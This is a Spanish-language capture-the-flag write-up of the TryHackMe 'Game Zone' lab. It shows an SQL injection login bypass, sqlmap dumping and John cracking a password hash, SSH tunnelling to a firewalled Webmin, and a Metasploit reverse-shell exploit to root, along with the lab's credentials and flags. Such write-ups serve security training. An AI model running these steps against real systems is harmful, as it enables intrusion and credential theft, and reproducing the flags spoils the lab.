Game Zone [TryHackMe]
2023-09-01
Introducción
Continúo con el learning path “Offensive Pentesting¨, esta vez con una maquina sencilla que presenta un ejemplo práctico de SQL Injection con sqlmap y el uso de un túnel SSH para exponer un servicio bloqueado por firewall, para finalmente logra acceso privilegiado con Metaploit.
Task 1 - Desplegar la máquina
Paso 1:
- Pongo la máquina en marcha y accedo a la aplicación web que tiene.
- La primera pregunta es sobre la imagen de un personaje de videojuegos que aparece en la web.
Task 2 - Obtain access via SQLi
Paso 2:
- La sala propone usar
' or 1=1 -- -para forzar la autencicaci’on, engañando a la base de datos con 1=1 y comentando lo que haya detras con “—” para conseguirlo. - La consulta SQL que se ejecuta en el servidor web es la siguiente:
SELECT * FROM users WHERE username = ' or 1=1 -- - AND password :=
- Al conseguir hacer el bypass a la autenticación, accedo a portal.php
Task 3 - Using SQLMap
Paso 3:
- Recurrimos a SQLMap para volcar toda la base de datos de GameZone.
- Capturo un post request buscando un juego en la web, usando burp suite, y lo guardo en un txt.
POST /portal.php HTTP/1.1
Host: 10.10.62.97
Content-Length: 15
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.62.97
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.62.97/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: PHPSESSID=nn8afcdulm4202grsvrrhspmn1
Connection: close
searchitem=game
- Uso sqlmap como indica sugiere la sala para hacer un volcado de la base de datos. No funciona.
sqlmap -r POST_request.txt --dbms=mysql --dump
- Busco sobre sqlmap y encuentro una forma diferente de hacerlo. Empiezo por extraer los nombres de las bases de datos que hay.
sqlmap -u "http://10.10.62.97/portal.php" --data="searchitem=test" --dbs
[16:03:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: PHP, Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[16:03:30] [INFO] fetching database names
available databases [5]:
[*] db
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[16:03:30] [INFO] fetched data logged to text files under '/home/k3ss/.local/share/sqlmap/output/10.10.62.97'
- Extraigo los nombres de las tablas en db
sqlmap -u "http://10.10.62.97/portal.php" --data="searchitem=test" -D db --tables
[16:08:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18, PHP
back-end DBMS: MySQL >= 5.6
[16:08:57] [INFO] fetching tables for database: 'db'
Database: db
[2 tables]
+-------+
| post |
| users |
+-------+
[16:08:57] [INFO] fetched data logged to text files under '/home/k3ss/.local/share/sqlmap/output/10.10.62.97'
- Extraigo los datos de la tabla users.
sqlmap -u "http://10.10.62.97/portal.php" --data="searchitem=test" -D db -T users --columns
[16:11:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: PHP, Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[16:11:58] [INFO] fetching columns for table 'users' in database 'db'
Database: db
Table: users
[2 columns]
+----------+------+
| Column | Type |
+----------+------+
| pwd | text |
| username | text |
+----------+------+
[16:11:58] [INFO] fetched data logged to text files under '/home/k3ss/.local/share/sqlmap/output/10.10.62.97'
Paso 4
- Sabiendo ya la estructura, hago el volcado con:
sqlmap -u "http://10.10.62.97/portal.php" --data="searchitem=test" -D db -T users -C pwd,username --dump
[16:13:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: PHP, Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[16:13:41] [INFO] fetching entries of column(s) 'pwd,username' for table 'users' in database 'db'
[16:13:41] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:13:47] [INFO] writing hashes to a temporary file '/tmp/sqlmapt61grbs538569/sqlmaphashes-dwlpsyxn.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:13:54] [INFO] using hash method 'sha256_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> /usr/share/wordlists/rockyou.txt
[16:14:14] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[16:14:18] [INFO] starting dictionary-based cracking (sha256_generic_passwd)
[16:14:18] [INFO] starting 24 processes
[16:14:20] [WARNING] no clear password(s) found
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |
+------------------------------------------------------------------+----------+
[16:14:20] [INFO] table 'db.users' dumped to CSV file '/home/k3ss/.local/share/sqlmap/output/10.10.62.97/dump/db/users.csv'
[16:14:20] [INFO] fetched data logged to text files under '/home/k3ss/.local/share/sqlmap/output/10.10.62.97'
[*] ending @ 16:14:20 /2023-09-01/
Task 4 - Cracking the hash
Paso 5
- Uso hashid para identeficar el tipo de hash. Parece probable que sea SHA-256
hashid
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
Analyzing 'ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14'
[+] Snefru-256
[+] SHA-256
[+] RIPEMD-256
[+] Haval-256
[+] GOST R 34.11-94
[+] GOST CryptoPro S-Box
[+] SHA3-256
[+] Skein-256
[+] Skein-512(256)
- Ataco el hash con john the ripper
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=24
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124 (?)
1g 0:00:00:00 DONE (2023-09-01 16:20) 6.666g/s 20971Kp/s 20971Kc/s 20971KC/s wildboy23..tom=tom
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.
Paso 6
- Accedo por SSH con las credenciales y obtengo la bandera
❯ ssh agent47@10.10.62.97
The authenticity of host '10.10.62.97 (10.10.62.97)' can't be established.
ED25519 key fingerprint is SHA256:CyJgMM67uFKDbNbKyUM0DexcI+LWun63SGLfBvqQcLA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.62.97' (ED25519) to the list of known hosts.
agent47@10.10.62.97's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Fri Aug 16 17:52:04 2019 from 192.168.1.147
agent47@gamezone:~$ whoami
agent47
agent47@gamezone:~$ cat
.bash_history .bash_logout .bashrc .cache/ .profile user.txt
agent47@gamezone:~$ cat user.txt
649ac17b1480ac13ef1e4fa579dac95c
Task 5 - Exposing services with reverse SSH tunnels
Paso 7
- Reviso los sockets en la maquina objetivo
agent47@gamezone:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
- El puerto 10000 está siendo bloqueado por un firewall, lo expongo con un tunel SSH entre la maquina y mi equipo local.
❯ ssh -L 10000:localhost:10000 agent47@10.10.62.97
agent47@10.10.62.97's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Fri Sep 1 09:21:58 2023 from 10.14.50.184
- Desde mi equipo, accedo a la url http://localhost:10000/
- Esta corriendo Webmin en ese socket, accedo con las credenciales de agent47 y veo que es la version 1.580
Task 6 - Privilege Escalation with Metasploit
Paso 7
- Busco en metasploit y configuro el exploit para usarlo.
msf6 > search webmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
2 exploit/linux/http/webmin_file_manager_rce 2022-02-26 excellent Yes Webmin File Manager RCE
3 exploit/linux/http/webmin_package_updates_rce 2022-07-26 excellent Yes Webmin Package Updates RCE
4 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
5 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
6 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
7 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
Interact with a module by name or index. For example info 7, use 7 or use exploit/linux/http/webmin_backdoor
msf6 > use 0
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set RHOSTS localhost
RHOSTS => localhost
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set USERNAME agent47
USERNAME => agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set PASSWORD videogamer124
PASSWORD => videogamer47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set LHOST tun0
- Ejecuto el exploit.
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > run
[*] Exploiting target ::1
...
[*] Session 1 created in the background.
- Abro sesión y obtengo acceso privilegiado.
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > sessions 1
[*] Starting interaction with 1...
whoami
root
- Estabilizo el shell con python, busco el flag y lo imprimo por pantalla.
python -c 'import pty;pty.spawn("/bin/bash")'
root@gamezone:~# cd
cd
root@gamezone:~# ls
ls
root.txt
root@gamezone:~# cat root.txt
cat root.txt
a4b945830144bdd71908d12d902adeee
Conclusion
Game Zone ha resultado ser una máquina bastante sencilla. He encontrado una dificultad a la hora de usar sqlmap como sugiere la sala, pero una búsqueda rápida me ha permitido encontrar una solución: usar sqlmap de más a menos, empezando por obtener los nombres de las bbdd y terminando con los datos de la tabla concreta que quería.